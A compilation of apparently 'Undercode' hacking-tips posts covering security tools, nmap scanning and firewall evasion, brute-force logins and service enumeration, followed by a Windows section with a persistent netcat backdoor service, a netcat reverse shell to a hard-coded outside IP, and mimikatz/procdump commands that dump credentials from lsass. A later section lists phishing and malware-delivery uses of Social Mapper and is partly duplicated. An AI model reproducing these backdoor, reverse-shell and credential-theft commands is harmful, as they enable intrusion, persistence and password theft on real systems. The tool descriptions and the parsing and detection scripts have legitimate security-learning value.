42) Xprobe2
Xprobe2 is an active OS fingerprinting tool. It sends crafted probes (mainly ICMP) to the target, compares the characteristics of the replies against a signature database using fuzzy (matrix-based) matching, and from the resulting scores guesses the remote operating system.
43) Ethereal (now Wireshark)
A graphical network sniffer that performs the same functions as Tcpdump, but with a much friendlier interface. Both Ethereal and Tcpdump rely on the pcap library (libpcap), so the two are very similar in many respects (for example, they use the same capture-filter rules and keywords). Ethereal is used in the same way as other graphical network sniffers.
44) Core Impact
A commercial penetration-testing framework, widely regarded as one of the strongest tools for vulnerability assessment and for exercising detection, prevention and response to security threats. By safely replicating real-world attacks against network servers and workstations, end-user systems and web applications, it helps you find and fix security issues before an attacker does.
45) IDA Pro
An interactive disassembler. It does not solve the reverse-engineering problem on its own: IDA flags suspicious or ambiguous instructions, but it will not resolve them for you. Your job is to tell IDA how to interpret them.
46) SolarWinds
A professional network management suite that can monitor and discover network devices. The following tools are included:
1) Network Performance Monitoring: bandwidth gauges, router CPU load, bandwidth monitor, CPU gauge, network performance monitor, SNMP graph and advanced CPU load.
2) Network Discovery: subnet list, Ping Sweep, IP network browser, DNS audit, IP address management, MAC address discovery, SNMP Sweep, network sonar.
3) Tools for Cisco networks: IP network browser, router CPU load, configuration download, configuration upload, configuration editor/viewer, proxy ping, compare running vs. startup configuration, router password decryption, CPU gauge and advanced CPU load.
4) Network Monitoring: Watch It!, network monitor, Syslog server, router CPU load, advanced ping and network performance monitor.
5) IP Address Management: advanced subnet calculator, DNS/WhoIs resolver, DHCP scope monitor, DNS audit, IP address management, Ping Sweep.
6) Security: router security check, TCP Reset, dictionary editor, SNMP brute-force attack, SNMP dictionary attack, router password decryption.
7) Ping & Diagnostic: ping, advanced ping, Trace Route, proxy ping, Ping Sweep.
8) MIB Browser: MIB Walk, update system MIBs, MIB browser and SNMP graph.
9) Others: TFTP server, WAN Killer, Wake-On-LAN.
47) Pwdump: a tool for dumping the password hashes (LM/NTLM hashes from the SAM database) of Windows user accounts.
48) lsof
Short for "list open files": it lists the files currently open on the system. In Linux everything is a file: devices are files, directories are files, even sockets are files. That makes lsof very useful for day-to-day Linux administration (for example, finding which process is holding a port open).
49) RainbowCrack
A password-hash cracking tool that works from precomputed rainbow tables rather than brute force. It can crack LM, MD5, SHA1 and other hash types, and further algorithms can be added. It runs on both Windows and Linux, and tables generated on one system can be used directly on the other. It is powerful, but more complicated to use than a plain dictionary cracker.
50) Firewalk
A network security tool that uses a traceroute-like technique (sending TCP/UDP probes whose TTL expires one hop past the gateway) and analyses the IP responses to determine which ports a gateway's access control list lets through; it can also be used to map the network behind the gateway.
51) Angry IP Scanner
An easy-to-use IP and port scanner. For each scanned host it can obtain the ping response time, hostname, computer name, workgroup, logged-in user name, MAC address, TTL, NetBIOS information and more. You can specify which ports to scan to see which are open on the target; for live hosts you can open them in Explorer, browse them with a web browser, connect over FTP or telnet, ping or tracert them, or look up the geographic location of the IP on the web. Given just a web address or hostname, Angry IP Scanner resolves the IP address and scans it. It also supports selecting and scanning whole Class B and Class C ranges, keeping a list of commonly used IPs, and exporting results to several file formats. Because scanning is multi-threaded it can probe dozens of IPs at once, so it is very fast.
52) RKHunter
Rootkit Hunter can detect about 58 known rootkits as well as some sniffers and backdoors. It runs a series of test scripts to determine whether the machine has been infected with a rootkit.
53) Ike-scan
A tool for discovering and fingerprinting IKE (Internet Key Exchange) services. IKE is the mechanism a VPN gateway and a remote client use to negotiate a connection. Ike-scan sends crafted IKE packets to each host in the target range; any host running IKE answers, confirming that a VPN endpoint is present. The tool then records and displays these responses and compares them against a set of known VPN product fingerprints.
54) Arpwatch
ARP (Address Resolution Protocol) maps IP addresses to the hardware (MAC) addresses of network devices. On Linux, arpwatch monitors and records the ARP traffic on the local network, keeps a database of IP-to-MAC pairings, and reports any change (a new station, a changed ethernet address, or a flip flop between two addresses) by e-mail. A gateway IP that suddenly answers from a different MAC is the classic sign of ARP spoofing.
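The detection logic arpwatch applies, as an added example (this is not arpwatch's own code): replay a constructed log of observed ARP replies and print the same three kinds of report. The log lines, the IPs and the MAC addresses are made up for the example; in practice you would feed it the IP/MAC pairs extracted from a sniffer.

```sh
#!/bin/sh
# Added example, not arpwatch's code. Each input line is "<time> <ip> <mac>",
# i.e. one ARP reply as observed on the wire. The awk program keeps the
# current MAC for every IP and the MAC it had before that, and reports:
#   new station             - the first time an IP is seen
#   changed ethernet address - the IP now answers from a different MAC
#   flip flop               - the IP swung back to the MAC it used before
# Repeated flip flops on the gateway IP are what ARP spoofing looks like:
# the real gateway and the attacker keep answering over each other.
set -eu

# Constructed sample traffic: 192.168.1.1 is the gateway, de:ad:be:ef:00:01
# plays the attacker.
ARP_LOG='10:00:01 192.168.1.1 00:11:22:33:44:55
10:00:05 192.168.1.20 aa:bb:cc:dd:ee:01
10:00:09 192.168.1.1 00:11:22:33:44:55
10:00:12 192.168.1.1 de:ad:be:ef:00:01
10:00:15 192.168.1.1 00:11:22:33:44:55
10:00:20 192.168.1.1 de:ad:be:ef:00:01'

# arp_report [FILE...]  reads the log from the given files or from stdin
arp_report() {
  awk '
    NF < 3 { next }                          # skip blank or malformed lines
    { ip = $2; mac = $3 }
    !(ip in cur) { cur[ip] = mac; print "new station " ip " " mac; next }
    cur[ip] == mac { next }                  # same pairing as before: nothing to report
    {
      kind = (prev[ip] == mac) ? "flip flop" : "changed ethernet address"
      print kind " " ip " " cur[ip] " -> " mac
      prev[ip] = cur[ip]; cur[ip] = mac
    }' "$@"
}

printf '%s\n' "$ARP_LOG" | arp_report
```

Running it prints two "new station" lines, one "changed ethernet address" line for the gateway, and then two "flip flop" lines as the gateway and the attacker alternate. arpwatch keeps the same state on disk (arp.dat) across runs, so a change is still noticed days later; this script only keeps it for one input.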
55) KisMAC
A free wireless sniffer for Mac OS X. The KisMAC installer does not set file permissions securely; a local attacker can exploit this to gain unauthorized access to sensitive files.
56) OSSEC HIDS
An open-source host-based intrusion detection system that includes log analysis, integrity checking and rootkit detection. As a HIDS, OSSEC is installed on the systems to be monitored. You do not always need the full installation: when several computers run OSSEC you can use the client/server (agent/manager) mode, where the agent sends its data back to the server for analysis. Monitoring several systems from one computer is economical and practical for business and home users alike. OSSEC's biggest advantage is that it runs on almost any operating system: Windows, Linux, OpenBSD/FreeBSD and macOS. However, agents running on Windows cannot do rootkit detection; agents on the other systems have no such limitation.
57) OpenBSD PF
PF is the firewall that ships with OpenBSD, and its users love it. Features include network address translation, TCP/IP traffic management, bandwidth control and packet prioritisation (queueing). It also has extras such as passive operating system detection. PF was written by the same people who write OpenBSD, and it has been carefully reviewed, designed and coded to avoid the kinds of vulnerabilities exposed in other packet filters.
58) Nemesis: a command-line packet crafting tool that can construct almost any type of ICMP packet (it also handles ARP, TCP, UDP and other protocols).
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 57 most dangerous tools tested: use for security, not for harm πΏ
#SUPPORT & SHARE
T.me/UndercodeTesting
π¦ Collection of practical skills of penetration testing Fast tips @undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best NMAP scanning strategy
# The best nmap scanning strategy for networks of all sizes
# Host discovery: generate a list of live hosts
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt
# Port discovery: the most commonly used ports
# https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
# Port discovery: all ports (a full UDP port scan is very slow)
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
# Turn the open TCP / UDP ports into an nmap -p specification
$ grep "open" FullTCP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "T:"$0}'
$ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "U:"$0}'
# Service version detection
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
# OS detection
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
# OS and service detection on selected ports
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
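The post-processing steps of the strategy above, as an added example (not part of the original post): shell functions that extract the live hosts from a greppable ping sweep and build the -p specification for the final targeted scan from the full TCP and UDP results. The nmap output files below are constructed for the example; the field layout is the one nmap writes, but the hosts and ports are made up. The functions take file names, so you can point them at your own Discovery.gnmap, FullTCP and FullUDP.

```sh
#!/bin/sh
# Added example: parse nmap -oG / -oN output into the inputs of the next scan.
# The scan results here are constructed; only the line format is nmap's.
set -eu

WORK=$(mktemp -d)

# Ping sweep, greppable format. A plain -sn run lists only hosts that are
# up; with -v the down hosts appear as well, so filter on the status.
cat > "$WORK/Discovery.gnmap" <<'EOF'
# Nmap 7.80 scan initiated as: nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
Host: 192.168.56.1 ()   Status: Up
Host: 192.168.56.101 () Status: Up
Host: 192.168.56.102 () Status: Down
# Nmap done: 256 IP addresses (2 hosts up) scanned
EOF

# Full TCP scan, normal format, two hosts (constructed)
cat > "$WORK/FullTCP" <<'EOF'
Nmap scan report for 192.168.56.1
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
135/tcp  filtered msrpc

Nmap scan report for 192.168.56.101
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
8080/tcp open     http-proxy
EOF

# Full UDP scan, normal format (constructed). UDP mostly reports
# open|filtered, which is not proof that anything is listening.
cat > "$WORK/FullUDP" <<'EOF'
Nmap scan report for 192.168.56.1
PORT    STATE         SERVICE
53/udp  open          domain
161/udp open|filtered snmp
EOF

# live_hosts GNMAPFILE: one IP per line, ready for -iL.
# Keyed on the field rather than on a delimiter, so it does not matter
# whether nmap separated "Host:" and "Status:" with a tab or with spaces.
live_hosts() {
  awk '/Status: Up/ { print $2 }' "$1"
}

# open_ports T|U NORMALFILE: the union of open ports across all hosts in
# the file, as an nmap -p fragment such as T:21,22,80. Only STATE "open"
# counts; a bare grep "open" would also pull in open|filtered rows and
# any service name that happens to contain "open".
open_ports() {
  awk '$2 == "open" { split($1, p, "/"); print p[1] }' "$2" |
    sort -nu | paste -s -d ',' - | sed "s/^/$1:/"
}

# port_spec TCPFILE UDPFILE: the combined -p argument for the
# OS + service detection scan (U:... first, then T:...).
port_spec() {
  printf '%s,%s\n' "$(open_ports U "$2")" "$(open_ports T "$1")"
}

live_hosts "$WORK/Discovery.gnmap" > "$WORK/LiveHosts.txt"
echo "live hosts:"; cat "$WORK/LiveHosts.txt"
echo "follow-up: nmap -O -sV -T4 -Pn -p $(port_spec "$WORK/FullTCP" "$WORK/FullUDP") -iL $WORK/LiveHosts.txt"
```

The script prints the two live hosts and the follow-up command with `-p U:53,T:21,22,80,8080`. If you want the open|filtered UDP ports in the list as well, change the awk test in open_ports to `$2 ~ /^open/`; keep in mind that those ports then need a version scan (-sV) to tell a real listener from a silent firewall.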
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap: web vulnerability scanning with the vulscan NSE script
fb.com/undercodeTesting
> cd /usr/share/nmap/scripts/
> wget <download URL of nmap_nse_vulscan-2.0.tar.gz, from the vulscan git repository or site>
> tar xzf nmap_nse_vulscan-2.0.tar.gz
> nmap -sS -sV --script=vulscan/vulscan.nse target
> nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv target
> nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv -p80 target
> nmap -PN -sS -sV --script=vulscan --script-args vulscancorrelation=1 -p80 target
> nmap -sV --script=vuln target
# --script=all runs every NSE script, including the intrusive ones, so only use it where that is in scope
> nmap -PN -sS -sV --script=all --script-args vulscancorrelation=1 target
π¦ Directory brute-forcing with DIRB
Note: DIRB is a tool dedicated to brute-forcing web directories and is installed by default in Kali. Similar tools include patator, dirsearch, DirBuster and the Chinese tool 御剑 (Yujian).
> dirb http://IP:PORT/ /usr/share/dirb/wordlists/common.txt
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap: evading firewalls
# Fragment the probe packets
> $ nmap -f [target]
# Set a custom MTU; it must be a multiple of 8 (8, 16, 24, 32, ...)
> $ nmap --mtu 24 [target]
# Hide among a random set of decoy source addresses
> $ nmap -D RND:10 [target]
# Specify the decoy IPs manually
> $ nmap -D decoy1,decoy2,decoy3 [target]
# Idle (zombie) scan: first find a suitable idle host to bounce the scan off
> $ nmap -sI [Zombie IP] [Target IP]
# Use a specific source port (some filters trust 53 or 80)
> $ nmap --source-port 80 [target]
# Append random data to every probe packet
> $ nmap --data-length 25 [target]
# Spoof the MAC address: give a vendor name such as Dell, Apple or 3Com (0 generates a random address)
> $ nmap --spoof-mac Dell [target]
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ More practical hacking tips by undercode:
t.me/undercodeTesting
π¦ Patator: all-round brute-force testing tool
# git clone https://github.com/lanjelot/patator.git /usr/share/patator
# SMTP brute force
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
# -x ignore:... drops the responses that match, so only successful logins are shown
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
π¦ DNS enumeration with Fierce
Note: Fierce first checks whether the DNS server allows zone transfers. If so, it performs the transfer and reports the result; if not, it enumerates hostnames by brute-force querying the DNS server with a wordlist. Similar tools: subDomainsBrute, SubBrute, etc.
# https://ha.ckers.org/fierce/
$ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt
Scanning web services with Nikto
nikto -C all -h https://IP
π¦ WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
# enumerate installed plugins
./wpscan --url https://IP/ --enumerate p
π¦ HTTP fingerprinting
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt
Scanning with Skipfish
Note: Skipfish is a web application security reconnaissance tool. It uses a recursive crawler and dictionary-based probes to build an interactive site map, then annotates the map with the results of its security checks.
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
π¦ Scanning with nc
nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
π¦ Unicornscan
Note: Unicornscan is a tool for information gathering and security auditing.
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
# -H   resolve hostnames when generating the report
# -m   scan mode (sf = TCP SYN, U = UDP)
# -Iv  show results immediately, verbose
OS fingerprinting with Xprobe2
xprobe2 -v -p tcp:80:open IP
π¦ Samba enumeration
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
π¦ SNMP enumeration
# snmpget needs an OID; sysDescr.0 is the usual first one to try
snmpget -v 1 -c public IP 1.3.6.1.2.1.1.1.0
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
Practical Windows cmd commands
net localgroup Users
net localgroup Administrators
# search the whole drive for .doc files
dir /s *.doc
# from a script: spawn a new cmd window that runs $cmd and stays open
system("start cmd.exe /k $cmd")
# persistence: register a service that starts a netcat backdoor at boot (note the space after each "=", sc requires it)
sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
# reverse shell from the target to the attacker's listener
cmd /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
# dump credentials from memory with mimikatz
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
# or dump lsass with procdump and parse the dump offline with mimikatz
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp          (32-bit system)
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp      (64-bit system)
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ you can get last hackers & Undercode news on: twitter.com/UndercodeNews π
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What about hijacking Wi-Fi?
1) Hijacker is a penetration testing tool with a graphical user interface. It integrates several well-known Wi-Fi attack tools, such as Aircrack-ng, Airodump-ng, MDK3 and Reaver.
2) Hijacker provides a simple, easy-to-use UI, so users do not have to type commands or copy and paste MAC addresses in a console.
3) The application is Android-only (ARM) and requires a wireless chipset that supports monitor mode. At present only a few devices qualify, so you may need custom firmware.
4) The Nexus 5 and other devices with the BCM4339 chip can install Nexmon; devices with the BCM4330 chip can install bcmon instead.
Note: the device must be rooted to use the tool.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How does the open-source tool Social Mapper work?
Finding one person's social media profiles by hand is easy; the question its authors asked was: "What if it can be done automatically and on a large scale with hundreds or thousands of people?"
π¦ Social Mapper runs in three phases:
> Phase 1: from the input you provide, the tool builds a target list (names plus photos). The list can come from a CSV file with links, a folder of images, or the people a company has registered on LinkedIn.
> Phase 2: once the targets are processed, Social Mapper automatically searches the social media sites for each one. The researchers recommend running it overnight on a good Internet connection, since a search for a list of 1,000 people can take more than 15 hours and uses a lot of bandwidth.
> Phase 3: after the search, Social Mapper generates reports: a spreadsheet with links to each target's profile pages, or a more visual HTML report with photos for quick inspection and verification of the results.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Social Mapper open source smart tools work ?
But, "What if it can be done automatically and on a large scale with hundreds or thousands of people?"
π¦ Social Mapper runs through three phases:
> Phase 1- The tool is based on what you provide The input of creates a target list (consisting of name and picture). The list can be provided through a link in the CSV file, an image in the folder, or someone registered on LinkedIn on the company.
> Stage 2- Once the target is processed, the second stage of Social Mapper automatically starts online search for social media sites to obtain the target.Researchers recommend running the tool overnight via a good Internet connection, because searching can take more than 15 hours to get a list of 1,000 people and use a lot of bandwidth.
> After the third stage search, the third stage of Social Mapper starts generating reports, such as a spreadsheet that contains a link to the profile page of the target list, or a more intuitive HTML report that contains photos for quick inspection and verification results.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ABOUT SOCIAL MEDIA TRACKING:
What could go wrong?
1) Although the end result is ideal for supporting highly targeted phishing campaigns or intelligence gathering, Trustwave says the tool gives security professionals and ethical hackers the same capabilities the bad guys already have, so they can test their customers' security.
2) However, because the tool is now open source, anyone, including criminals or intelligence agencies, can reuse its facial recognition technique to build their own surveillance tools that search the large amount of data that has already been collected. Trustwave further outlines some malicious uses of Social Mapper.
3) Once you have the end result, its uses are limited "only by your imagination". It can be used to:
1) Create fake social media profiles to "friend" the target, then send them links to downloadable malware or to credential-capturing landing pages.
The goal of the impersonation is to get the target to disclose their email addresses and phone numbers through vouchers and offers, and then pivot to phishing by email, voice or SMS.
2) Create custom phishing campaigns for each social media platform on which the target is confirmed to have an account, and make them more convincing by including the target's profile picture in the email. Then capture the password and reuse it elsewhere.
3) Look at the target's photos to find employee access badges and to become familiar with the interior of the building.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Detailed IP address summary
t.me/undercodeTesting
1) Classful IP addresses
Each class of address consists of two fixed-length fields:
> Network number (net-id): identifies the network to which the host (or router) is connected.
> Host number (host-id): identifies the host (or router) within that network.
A two-level IP address can be written as:
IP address ::= {<network number>, <host number>}
::= stands for "is defined as"
Class A address: network field 1 byte (8 bits)
Class B address: network field 2 bytes (16 bits)
Class C address: network field 3 bytes (24 bits)
π¦ Some important characteristics of IP addresses:
1) An IP address is a hierarchical address with two levels. The benefits of the two levels:
First: When the address authority assigns IP addresses, it assigns only the network number; the host numbers within that network are assigned at the discretion of the organisation that received it.
Second: A router forwards a packet based only on the network number of the destination host, not on the host number. This greatly reduces the number of entries in the routing table, and therefore the storage space the routing table occupies.
Third: The network numbers in the IP addresses of hosts or routers on the same local area network must be the same.
Fourth: A router always has two or more IP addresses. Each interface of the router has an IP address with a different network number.
Fifth: Resolution from an IP address to a hardware address is automatic; the user of the host is unaware of this address resolution process. Whenever a host or router wants to communicate with another host or router on the network whose IP address it knows, the ARP protocol automatically resolves the IP address to the link-layer hardware address.
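The two-level {<network number>, <host number>} split and its routing-table consequence, as an added example in Python that is not code from the original page. It models the classful rules the page describes; note that classful addressing is historical and real routers today match CIDR prefixes with longest-prefix match, so this is a model of the text, not of a current router. The addresses, interface lists and routing table are constructed sample data.

```python
"""Classful (two-level) IPv4 addressing: net-id / host-id split.

Added example. The class boundaries and the two-level structure are the
ones the page describes; all addresses below are constructed samples.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

# Class -> number of bits in the network field (net-id); the host field is the rest.
NET_BITS = {"A": 8, "B": 16, "C": 24}


def to_int(dotted: str) -> int:
    """Parse a dotted quad into a 32-bit integer, rejecting malformed input."""
    parts = dotted.split(".")
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {dotted!r}")
    value = 0
    for part in parts:
        if not part.isdigit():
            raise ValueError(f"non-numeric octet in {dotted!r}")
        octet = int(part)
        if octet > 255:
            raise ValueError(f"octet out of range in {dotted!r}")
        value = (value << 8) | octet
    return value


def to_dotted(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def address_class(value: int) -> str:
    """The class is fixed by the leading bits of the first octet."""
    first = value >> 24
    if first >> 7 == 0b0:
        return "A"
    if first >> 6 == 0b10:
        return "B"
    if first >> 5 == 0b110:
        return "C"
    if first >> 4 == 0b1110:
        return "D"  # multicast: no net-id/host-id split
    return "E"      # reserved


@dataclass(frozen=True)
class ClassfulAddress:
    address: str
    cls: str
    net_id: int   # the network number
    host_id: int  # the host number within that network


def split(dotted: str) -> ClassfulAddress:
    """Split a unicast address into {<network number>, <host number>}."""
    value = to_int(dotted)
    cls = address_class(value)
    if cls not in NET_BITS:
        raise ValueError(f"{dotted} is class {cls}; it has no net-id/host-id split")
    host_bits = 32 - NET_BITS[cls]
    return ClassfulAddress(dotted, cls, value >> host_bits, value & ((1 << host_bits) - 1))


def network_number(dotted: str) -> str:
    """Network number as a dotted quad with the host field zeroed."""
    a = split(dotted)
    return to_dotted(a.net_id << (32 - NET_BITS[a.cls]))


def same_network(a: str, b: str) -> bool:
    """Hosts on the same LAN must share a network number (point Third)."""
    x, y = split(a), split(b)
    return x.cls == y.cls and x.net_id == y.net_id


def valid_router_interfaces(addresses: Iterable[str]) -> bool:
    """A router has two or more addresses, each on a different network (point Fourth)."""
    nets = [network_number(addr) for addr in addresses]
    return len(nets) >= 2 and len(set(nets)) == len(nets)


def route_lookup(table: Dict[str, str], destination: str) -> Optional[str]:
    """Forward on the destination's network number only (point Second):
    the table holds one entry per network, never one per host."""
    return table.get(network_number(destination))


if __name__ == "__main__":
    # Constructed routing table: network number -> outgoing interface.
    routes = {"10.0.0.0": "eth0", "172.16.0.0": "eth1", "192.168.1.0": "eth2"}
    for dst in ("10.1.2.3", "172.16.99.4", "192.168.1.77", "8.8.8.8"):
        a = split(dst)
        print(f"{dst}: class {a.cls}, net {network_number(dst)}, "
              f"host-id {a.host_id}, via {route_lookup(routes, dst)}")
```

Running it shows why the page's Second point holds: every host in 172.16.0.0/16 hits the same single entry, and the lookup key never contains the host number. The same functions also expose the classful model's weakness, which is why CIDR replaced it: `same_network("10.1.2.3", "10.200.0.1")` is true because a class A network spans sixteen million hosts.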